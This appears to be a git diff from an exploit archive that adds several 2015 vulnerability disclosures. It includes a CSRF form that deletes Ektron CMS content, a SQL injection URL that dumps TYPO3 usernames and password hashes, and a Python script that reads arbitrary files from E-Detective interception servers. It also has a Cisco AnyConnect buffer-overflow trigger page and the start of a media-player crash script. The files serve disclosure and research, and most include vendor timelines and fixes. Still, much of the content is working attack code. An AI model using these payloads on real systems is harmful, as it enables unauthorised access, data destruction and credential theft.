# CVE ID: CVE-2015-3624
|
||||||
|
# Credit: Jerold Hoong
|
||||||
|
|
||||||
|
# PROOF OF CONCEPT (CSRF)
|
||||||
|
|
||||||
|
Cross-site request forgery (CSRF) vulnerability in MenuActions.aspx in Ektron CMS 9.10
|
||||||
|
SP1 before build 9.1.0.184.1.120 allows remote attackers to hijack the authentication
|
||||||
|
of content administrators for requests that could lead to the deletion of content and
|
||||||
|
assets.
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://127.0.0.1/Test/WorkArea/DmsMenu/menuActions/MenuActions.aspx">
|
||||||
|
<input type="hidden" name="action" value="delete" />
|
||||||
|
<input type="hidden" name="contentId" value="4210" />
|
||||||
|
<input type="hidden" name="LangType" value="1033" />
|
||||||
|
<input type="hidden" name="folderId" value="561" />
|
||||||
|
<input type="hidden" name="redirectBack" value="true" />
|
||||||
|
<input type="hidden" name="menuType" value="Workarea" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
# TIMELINE
|
||||||
|
– 07/04/2015: Vulnerability found
|
||||||
|
– 07/04/2015: Vendor informed
|
||||||
|
– 08/04/2015: Vendor responded and acknowledged
|
||||||
|
- 01/05/2015: MITRE issued CVE number CVE-2015-3624
|
||||||
|
– 28/05/2015: Vendor fixed the issue
|
||||||
|
– 31/05/2015: Public disclosure
|
149
platforms/php/webapps/37301.txt
Executable file
149
platforms/php/webapps/37301.txt
Executable file
|
@ -0,0 +1,149 @@
|
||||||
|
Advisory: SQL Injection in TYPO3 Extension Akronymmanager
|
||||||
|
|
||||||
|
An SQL injection vulnerability in the TYPO3 extension "Akronymmanager"
|
||||||
|
allows authenticated attackers to inject SQL statements and thereby read
|
||||||
|
data from the TYPO3 database.
|
||||||
|
|
||||||
|
|
||||||
|
Details
|
||||||
|
=======
|
||||||
|
|
||||||
|
Product: sb_akronymmanager
|
||||||
|
Affected Versions: <=0.5.0
|
||||||
|
Fixed Versions: 7.0.0
|
||||||
|
Vulnerability Type: SQL Injection
|
||||||
|
Security Risk: medium
|
||||||
|
Vendor URL: http://typo3.org/extensions/repository/view/sb_akronymmanager
|
||||||
|
Vendor Status: fixed version released
|
||||||
|
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-002
|
||||||
|
Advisory Status: published
|
||||||
|
CVE: CVE-2015-2803
|
||||||
|
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2803
|
||||||
|
|
||||||
|
|
||||||
|
Introduction
|
||||||
|
============
|
||||||
|
|
||||||
|
"The Acronym Manager adds special explanatory markup to acronyms, abbreviations
|
||||||
|
and foreign words on the whole site following the requirement to accessible web
|
||||||
|
content.
|
||||||
|
|
||||||
|
It provides a backend module to administer a list of words to generate new HTML
|
||||||
|
elements for explanatory markup."
|
||||||
|
|
||||||
|
(from the extension's documentation)
|
||||||
|
|
||||||
|
|
||||||
|
More Details
|
||||||
|
============
|
||||||
|
|
||||||
|
Users with the respective privileges can maintain acronyms through the
|
||||||
|
Akronymmanager extension pages in the TYPO3 backend web interface.
|
||||||
|
|
||||||
|
In the extension's file mod1/index.php, an SQL query is generated like
|
||||||
|
follows (line 357 and following):
|
||||||
|
|
||||||
|
[...]
|
||||||
|
$pageID = t3lib_div::_GET("id");
|
||||||
|
if ($pageID) $where = "uid='$pageID' AND ";
|
||||||
|
$result = $GLOBALS['TYPO3_DB']->exec_SELECTquery('title,uid', 'pages',
|
||||||
|
$where.'hidden="0" AND deleted="0"','sorting');
|
||||||
|
[...]
|
||||||
|
|
||||||
|
The value of the user-supplied HTTP GET parametre 'id' is used without
|
||||||
|
sanitizing it before its use in the subsequent SQL statement. Therefore,
|
||||||
|
attackers are able to manipulate the resulting SQL statement and inject
|
||||||
|
their own queries into the statement.
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept
|
||||||
|
================
|
||||||
|
|
||||||
|
When requesting the following URL, the vulnerability is exploited to yield all
|
||||||
|
usernames and hashes from the TYPO3 be_users database:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
http://server/typo3conf/ext/sb_akronymmanager/mod1/index.php?
|
||||||
|
id=379%27%20UNION%20SELECT%20(SELECT%20group_concat(username,%27:%27,password)
|
||||||
|
%20FROM%20be_users),2%20--%20
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The login credentials are then embedded in the HTML page that is
|
||||||
|
returned:
|
||||||
|
|
||||||
|
[...]
|
||||||
|
<!-- Section header -->
|
||||||
|
<h2>user1:$hash,user2:$hash[...]</h2>
|
||||||
|
[...]
|
||||||
|
|
||||||
|
|
||||||
|
Workaround
|
||||||
|
==========
|
||||||
|
|
||||||
|
Only give trusted users access to the Akronymmanager extension in the
|
||||||
|
TYPO3 backend.
|
||||||
|
|
||||||
|
|
||||||
|
Fix
|
||||||
|
===
|
||||||
|
|
||||||
|
Upgrade the extension to version 7.0.0.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk
|
||||||
|
=============
|
||||||
|
|
||||||
|
An attacker who has access to the backend part of the Akronymmanager
|
||||||
|
extension may send SQL queries to the database. This can be used to read
|
||||||
|
arbitrary tables of the TYPO3 database and may ultimately result in a
|
||||||
|
privilege escalation if the TYPO3 users' password hashes can be cracked
|
||||||
|
efficiently. Depending on the database configuration, it might also be
|
||||||
|
possible to execute arbitrary commands on the database host. As the
|
||||||
|
attack requires an attacker who already has backend access, the
|
||||||
|
vulnerability is estimated to pose only a medium risk.
|
||||||
|
|
||||||
|
|
||||||
|
Timeline
|
||||||
|
========
|
||||||
|
|
||||||
|
2015-02-25 Vulnerability identified
|
||||||
|
2015-03-04 Customer approved disclosure to vendor
|
||||||
|
2015-03-10 CVE number requested
|
||||||
|
2015-03-10 Vendor notified
|
||||||
|
2015-03-26 CVE number requested again
|
||||||
|
2015-03-31 CVE number assigned (request #2)
|
||||||
|
2015-03-31 Vendor notified again
|
||||||
|
2015-03-31 Vendor responded
|
||||||
|
2015-04-08 Vendor announced fixed version available at the end of April
|
||||||
|
2015-05-13 Requested update from vendor
|
||||||
|
2015-05-15 Vendor requests more time
|
||||||
|
2015-05-21 Requested update from vendor
|
||||||
|
2015-05-22 Vendor states that upload to extension registry doesn't work
|
||||||
|
2015-06-03 Requested update from vendor
|
||||||
|
2015-06-10 Vendor uploads new version to extension registry
|
||||||
|
2015-06-15 Advisory published
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
RedTeam Pentesting GmbH
|
||||||
|
=======================
|
||||||
|
|
||||||
|
RedTeam Pentesting offers individual penetration tests performed by a
|
||||||
|
team of specialised IT-security experts. Hereby, security weaknesses in
|
||||||
|
company networks or products are uncovered and can be fixed immediately.
|
||||||
|
|
||||||
|
As there are only few experts in this field, RedTeam Pentesting wants to
|
||||||
|
share its knowledge and enhance the public knowledge with research in
|
||||||
|
security-related areas. The results are made available as public
|
||||||
|
security advisories.
|
||||||
|
|
||||||
|
More information about RedTeam Pentesting can be found at
|
||||||
|
https://www.redteam-pentesting.de.
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
|
||||||
|
Dennewartstr. 25-27 Fax : +49 241 510081-99
|
||||||
|
52068 Aachen https://www.redteam-pentesting.de
|
||||||
|
Germany Registergericht: Aachen HRB 14004
|
||||||
|
Geschäftsführer: Patrick Hof, Jens Liebchen
|
107
platforms/php/webapps/37302.txt
Executable file
107
platforms/php/webapps/37302.txt
Executable file
|
@ -0,0 +1,107 @@
|
||||||
|
Advisory: E-Detective Lawful Interception System
|
||||||
|
multiple security vulnerabilities
|
||||||
|
Date: 14/06/2015
|
||||||
|
CVE: unassigned
|
||||||
|
Authors: Mustafa Al-Bassam (https://musalbas.com)
|
||||||
|
slipstream/RoL (https://twitter.com/TheWack0lian)
|
||||||
|
Software: Decision Group E-Detective Lawful Interception System
|
||||||
|
Vendor URL: http://www.edecision4u.com/
|
||||||
|
|
||||||
|
Software description:
|
||||||
|
|
||||||
|
"E-Detective is a real-time Internet interception, monitoring and
|
||||||
|
forensics system that captures, decodes, and reconstructs various types
|
||||||
|
of Internet traffic. It is commonly used for organization Internet
|
||||||
|
behavioural monitoring, auditing, record keeping, forensics analysis, and
|
||||||
|
investigation, as well as, legal and lawful interception for lawful
|
||||||
|
enforcement agencies such as Police Intelligence, Military Intelligence,
|
||||||
|
Cyber Security Departments, National Security Agencies, Criminal
|
||||||
|
Investigation Agencies, Counter Terrorism Agencies etc."
|
||||||
|
|
||||||
|
Vulnerabilities:
|
||||||
|
|
||||||
|
1) Unauthenticated Local File Disclosure
|
||||||
|
|
||||||
|
-----
|
||||||
|
Proof-of-concept:
|
||||||
|
https://github.com/musalbas/edetective-poc/blob/master/pwned-detective.py
|
||||||
|
|
||||||
|
# Proof-of-concept for unauthenticated LFD in E-Detective.
|
||||||
|
# Authors: Mustafa Al-Bassam (https://musalbas.com)
|
||||||
|
# slipstream/RoL (https://twitter.com/TheWack0lian)
|
||||||
|
|
||||||
|
import argparse
|
||||||
|
import base64
|
||||||
|
import urllib2
|
||||||
|
|
||||||
|
|
||||||
|
def display_banner():
|
||||||
|
print """
|
||||||
|
_
|
||||||
|
| |
|
||||||
|
_ ____ ___ __ ___ __| |______
|
||||||
|
| '_ \ \ /\ / / '_ \ / _ \/ _` |______|
|
||||||
|
| |_) \ V V /| | | | __/ (_| |
|
||||||
|
| .__/ \_/\_/ |_| |_|\___|\__,_|
|
||||||
|
| |
|
||||||
|
|_|
|
||||||
|
_ _ _ _
|
||||||
|
| | | | | | (_)
|
||||||
|
__| | ___| |_ ___ ___| |_ ___ _____
|
||||||
|
/ _` |/ _ \ __/ _ \/ __| __| \ \ / / _ \\
|
||||||
|
| (_| | __/ || __/ (__| |_| |\ V / __/
|
||||||
|
\__,_|\___|\__\___|\___|\__|_| \_/ \___|
|
||||||
|
"""
|
||||||
|
|
||||||
|
argparser = argparse.ArgumentParser(description='Proof-of-concept for unauthenticated LFD in E-Detective.')
|
||||||
|
argparser.add_argument('hostname', help='hostname to pwn')
|
||||||
|
argparser.add_argument('file', help='path to file on server to grab')
|
||||||
|
|
||||||
|
|
||||||
|
def encode(text):
|
||||||
|
encoded = ''
|
||||||
|
|
||||||
|
for i in range(len(text)):
|
||||||
|
encoded += chr(ord(text[i]) + 40)
|
||||||
|
|
||||||
|
encoded = base64.b64encode(encoded)
|
||||||
|
return encoded
|
||||||
|
|
||||||
|
|
||||||
|
def poc(hostname, file):
|
||||||
|
return http_read('https://' + hostname + '/common/download.php?file=' + encode(file))
|
||||||
|
|
||||||
|
|
||||||
|
def http_read(url):
|
||||||
|
return urllib2.urlopen(url).read()
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
display_banner()
|
||||||
|
args = argparser.parse_args()
|
||||||
|
print poc(args.hostname, args.file)
|
||||||
|
|
||||||
|
|
||||||
|
-----
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
The /common/download.php in the web root allows for an unauthenticated
|
||||||
|
user to read any file on the system that the web user has access to.
|
||||||
|
This includes database credentials and any traffic intercepts captured
|
||||||
|
by the system.
|
||||||
|
|
||||||
|
The "file" parametre is "protected" by inadequate "cipher": base64
|
||||||
|
followed by rot40, which is trivially reversible.
|
||||||
|
|
||||||
|
2) Authenticated Remote Code Execution
|
||||||
|
|
||||||
|
The restore feature in the "config backup" page extracts a .tar file
|
||||||
|
encrypted with OpenSSL blowfish into the root directory (/) as root.
|
||||||
|
|
||||||
|
The .tar file should be encrypted with the static key "/tmp/.charlie".
|
||||||
|
Yes, that's the actual key - they pass the wrong argument to OpenSSL.
|
||||||
|
They used -k instead of -kfile, thus the key is the path of the key file
|
||||||
|
rather than the contents of the key file.
|
||||||
|
|
||||||
|
This enables an attacker to upload a shell into the web root, or
|
||||||
|
overwrite any system files such as /etc/shadow.
|
244
platforms/windows/dos/37287.html
Executable file
244
platforms/windows/dos/37287.html
Executable file
|
@ -0,0 +1,244 @@
|
||||||
|
<!--
|
||||||
|
|
||||||
|
Cisco AnyConnect Secure Mobility Client Remote Command Execution
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Cisco Systems, Inc.
|
||||||
|
Product web page: http://www.cisco.com
|
||||||
|
Affected version: 2.x
|
||||||
|
3.0
|
||||||
|
3.0.0A90
|
||||||
|
3.1.0472
|
||||||
|
3.1.05187
|
||||||
|
3.1.06073
|
||||||
|
3.1.06078
|
||||||
|
3.1.06079
|
||||||
|
3.1.07021
|
||||||
|
3.1.08009
|
||||||
|
4.0.00013
|
||||||
|
4.0.00048
|
||||||
|
4.0.00051
|
||||||
|
4.0.02052
|
||||||
|
4.0.00057
|
||||||
|
4.0.00061
|
||||||
|
4.1.00028
|
||||||
|
|
||||||
|
Fixed in: 3.1.09005
|
||||||
|
4.0.04006
|
||||||
|
4.1.02004
|
||||||
|
4.1.02011
|
||||||
|
|
||||||
|
Summary: Cisco AnyConnect Secure Mobility Solution empowers your
|
||||||
|
employees to work from anywhere, on corporate laptops as well as
|
||||||
|
personal mobile devices, regardless of physical location. It provides
|
||||||
|
the security necessary to help keep your organization’s data safe
|
||||||
|
and protected.
|
||||||
|
|
||||||
|
Desc: The AnyConnect Secure Mobility Client VPN API suffers from
|
||||||
|
a stack buffer overflow vulnerability when parsing large amount of
|
||||||
|
bytes to the 'strHostNameOrAddress' parameter in 'ConnectVpn' function
|
||||||
|
which resides in the vpnapi.dll library, resulting in memory corruption
|
||||||
|
and overflow of the stack. An attacker can gain access to the system
|
||||||
|
of the affected node and execute arbitrary code.
|
||||||
|
|
||||||
|
==========================================================================
|
||||||
|
|
||||||
|
(f48.10cc): Unknown exception - code 000006ba (first chance)
|
||||||
|
(f48.10cc): C++ EH exception - code e06d7363 (first chance)
|
||||||
|
(f48.10cc): C++ EH exception - code e06d7363 (first chance)
|
||||||
|
(f48.10cc): Stack overflow - code c00000fd (first chance)
|
||||||
|
First chance exceptions are reported before any exception handling.
|
||||||
|
This exception may be expected and handled.
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnapi.dll -
|
||||||
|
eax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022
|
||||||
|
eip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc
|
||||||
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
|
||||||
|
vpnapi!ConnectIfcData::setConfigCookie+0x9195:
|
||||||
|
748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000
|
||||||
|
0:000> g
|
||||||
|
(f48.10cc): Stack overflow - code c00000fd (!!! second chance !!!)
|
||||||
|
eax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022
|
||||||
|
eip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc
|
||||||
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
|
||||||
|
vpnapi!ConnectIfcData::setConfigCookie+0x9195:
|
||||||
|
748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000
|
||||||
|
0:000> d edi
|
||||||
|
088f0022 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0032 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0042 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0052 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0062 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0072 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0082 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0092 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
0:000> d edx
|
||||||
|
088f0024 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0034 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0044 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0054 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0064 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0074 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0084 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
088f0094 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
|
||||||
|
<12308000 B
|
||||||
|
|
||||||
|
----
|
||||||
|
|
||||||
|
>512150-512154 B
|
||||||
|
|
||||||
|
First chance exceptions are reported before any exception handling.
|
||||||
|
This exception may be expected and handled.
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\RPCRT4.dll -
|
||||||
|
eax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738
|
||||||
|
eip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc
|
||||||
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
|
||||||
|
RPCRT4!UuidCreate+0x835:
|
||||||
|
75440fc4 56 push esi
|
||||||
|
0:000> g
|
||||||
|
(1a50.1e40): Stack overflow - code c00000fd (!!! second chance !!!)
|
||||||
|
eax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738
|
||||||
|
eip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc
|
||||||
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
|
||||||
|
RPCRT4!UuidCreate+0x835:
|
||||||
|
75440fc4 56 push esi
|
||||||
|
0:000> d eax
|
||||||
|
004d2384 46 75 6e 63 74 69 6f 6e-3a 20 43 6c 69 65 6e 74 Function: Client
|
||||||
|
004d2394 49 66 63 42 61 73 65 3a-3a 67 65 74 43 6f 6e 6e IfcBase::getConn
|
||||||
|
004d23a4 65 63 74 4d 67 72 0a 46-69 6c 65 3a 20 2e 5c 43 ectMgr.File: .\C
|
||||||
|
004d23b4 6c 69 65 6e 74 49 66 63-42 61 73 65 2e 63 70 70 lientIfcBase.cpp
|
||||||
|
004d23c4 0a 4c 69 6e 65 3a 20 32-35 38 30 0a 43 61 6c 6c .Line: 2580.Call
|
||||||
|
004d23d4 20 74 6f 20 67 65 74 43-6f 6e 6e 65 63 74 4d 67 to getConnectMg
|
||||||
|
004d23e4 72 20 77 68 65 6e 20 6e-6f 74 20 63 6f 6e 6e 65 r when not conne
|
||||||
|
004d23f4 63 74 65 64 20 74 6f 20-41 67 65 6e 74 2e 00 00 cted to Agent...
|
||||||
|
0:000> d
|
||||||
|
004d2404 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||||||
|
004d2414 00 00 00 00 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA
|
||||||
|
004d2424 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
004d2434 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
004d2444 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
004d2454 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
004d2464 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
004d2474 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
0:000> d esp+1500
|
||||||
|
00194500 00 00 00 00 f8 e6 28 00-ec 3c 85 74 04 00 00 00 ......(..<.t....
|
||||||
|
00194510 ff ff ff ff 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||||||
|
00194520 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
00194530 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
00194540 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
00194550 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
00194560 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
00194570 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
|
||||||
|
==========================================================================
|
||||||
|
|
||||||
|
|
||||||
|
Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
||||||
|
Microsoft Windows 7 Ultimate SP1 (EN)
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Vendor status:
|
||||||
|
|
||||||
|
[25.03.2015] Vulnerability discovered.
|
||||||
|
[28.03.2015] Vendor contacted.
|
||||||
|
[29.03.2015] Vendor responds asking more details.
|
||||||
|
[13.04.2015] Sent details to the vendor.
|
||||||
|
[15.04.2015] Asked vendor for status update.
|
||||||
|
[15.04.2015] Vendor opens case #PSIRT-0089839229, informing that as soon as incident manager takes ownership of the case they will be in contact.
|
||||||
|
[22.04.2015] Asked vendor for status update.
|
||||||
|
[28.04.2015] No reply from the vendor.
|
||||||
|
[04.05.2015] Asked vendor for status update.
|
||||||
|
[05.05.2015] Vendor assigns case PSIRT-0089839229, defect CSCuu18805 under investigation.
|
||||||
|
[12.05.2015] Asked vendor for confirmation.
|
||||||
|
[13.05.2015] Vendor resolved the issue, not sure for the release date.
|
||||||
|
[14.05.2015] Asked vendor for approximate scheduled release date.
|
||||||
|
[15.05.2015] Vendor informs that the defect is public (CSCuu18805).
|
||||||
|
[19.05.2015] Asked vendor for release information.
|
||||||
|
[19.05.2015] Vendor informs releases expected to be on June 7th for 3.1 MR9 and May 31st for 4.1 MR2.
|
||||||
|
[11.06.2015] Vendor releases version 4.1.02011 and 3.1.09005 to address this issue.
|
||||||
|
[13.06.2015] Public security advisory released.
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2015-5246
|
||||||
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5246.php
|
||||||
|
Vendor: https://tools.cisco.com/bugsearch/bug/CSCuu18805
|
||||||
|
|
||||||
|
|
||||||
|
25.03.2015
|
||||||
|
|
||||||
|
-->
|
||||||
|
|
||||||
|
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Cisco AnyConnect Secure Mobility Client VPN API Stack Overflow</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<button onclick="O_o()">Launch</button>
|
||||||
|
<object id="cisco" classid="clsid:{C15C0F4F-DDFB-4591-AD53-C9A71C9C15C0}"></object>
|
||||||
|
<script language="JavaScript">
|
||||||
|
|
||||||
|
function O_o() {
|
||||||
|
//targetFile = "C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnapi.dll"
|
||||||
|
//prototype = "Sub ConnectVpn ( ByVal strHostNameOrAddress As String )"
|
||||||
|
//memberName = "ConnectVpn"
|
||||||
|
//progid = "VpnApiLib.VpnApi"
|
||||||
|
|
||||||
|
var netv = Array(255712).join("ZS");
|
||||||
|
var push = //~~~~~~~~~~~~~~~~~~~~~~~~//
|
||||||
|
|
||||||
|
/*(()()())*/
|
||||||
|
"ZSZSZSZSZSZSZ"+
|
||||||
|
"SZSZSZSZSZSZSZS"+
|
||||||
|
"ZSZSZSZSZSZSZSZSZSZS"+
|
||||||
|
"ZSZSZSZSZSZSZSZSZSZSZSZS"+
|
||||||
|
"ZSZSZSZSZSZSZSZSZSZSZSZSZS"+
|
||||||
|
"ZSZSZSZ"+ "SZSZ" +"SZSZSZ"+
|
||||||
|
"SZSZSZ"+ "SZSZ" +"SZSZSZ"+
|
||||||
|
"SZSZS"+ "ZSZS" +"ZSZSZ"+
|
||||||
|
"SZSZS"+ "ZSZS" +"ZSZSZ"+
|
||||||
|
"SZSZS"+"ZSZSZ"+"SZSZS"+
|
||||||
|
"SZSZSZSZSZSZSZSZSZSZSZS"+
|
||||||
|
"ZSZSZSZSZSZSZSZSZSZSZSZSZ"+
|
||||||
|
"SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS"+
|
||||||
|
"ZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZ"+
|
||||||
|
"SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS"+
|
||||||
|
"ZSZSZSZ" +"SZSZSZSZSZSZ"+ "SZSZ"+
|
||||||
|
"SZSZSZS" +"ZSZSZSZSZSZSZS"+ "ZSZS"+
|
||||||
|
"ZSZSZSZ" +"SZSZSZSZSZSZSZ"+ "SZSZ"+
|
||||||
|
"SZSZSZSZ"+ "SZSZSZSZSZSZSZSZS"+ "ZSZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS" +"ZSZ" +"SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
|
||||||
|
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
|
||||||
|
"SZ" +"SZ" +"SZ" +"SZ" +"SZ"+ "SZ"+
|
||||||
|
"SZ" +"SZ" +"SZ" +"SZ" +"SZ"+ "SZ"+
|
||||||
|
"S"+ "Z"+ "S"+ "Z"+ "S"+ "Z"+
|
||||||
|
"S"+ "Z"+ "S"+ "Z"+ "S"+ "S"+
|
||||||
|
"S"+ "Z"+ "S"+ "Z"+ "S"+ "S";
|
||||||
|
|
||||||
|
|
||||||
|
var godeep = netv.concat(push);
|
||||||
|
cisco.ConnectVpn godeep
|
||||||
|
}
|
||||||
|
|
||||||
|
</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
43
platforms/windows/dos/37299.py
Executable file
43
platforms/windows/dos/37299.py
Executable file
|
@ -0,0 +1,43 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
#[+] Author: SATHISH ARTHAR
|
||||||
|
#[+] Exploit Title: XtMediaPlayer - 0.93 Memory Corruption PoC
|
||||||
|
#[+] Date: 16-06-2015
|
||||||
|
#[+] Category: DoS/PoC
|
||||||
|
#[+] Tested on: WinXp/Windows 7
|
||||||
|
#[+] Vendor: http://downloads.sourceforge.net/project/xtmediaplayer/XtMediaPlayer/XtMediaPlayer_0.93_Win.rar
|
||||||
|
#[+] Sites: sathisharthars.wordpress.com
|
||||||
|
#[+] Twitter: @sathisharthars
|
||||||
|
#[+] Thanks: offensive security (@offsectraining)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
import os
|
||||||
|
os.system("color 02")
|
||||||
|
|
||||||
|
print"###########################################################"
|
||||||
|
print"# Title: XtMediaPlayer - 0.93 Memory Corruption PoC #"
|
||||||
|
print"# Author: SATHISH ARTHAR #"
|
||||||
|
print"# Category: DoS/PoC # "
|
||||||
|
print"###########################################################"
|
||||||
|
|
||||||
|
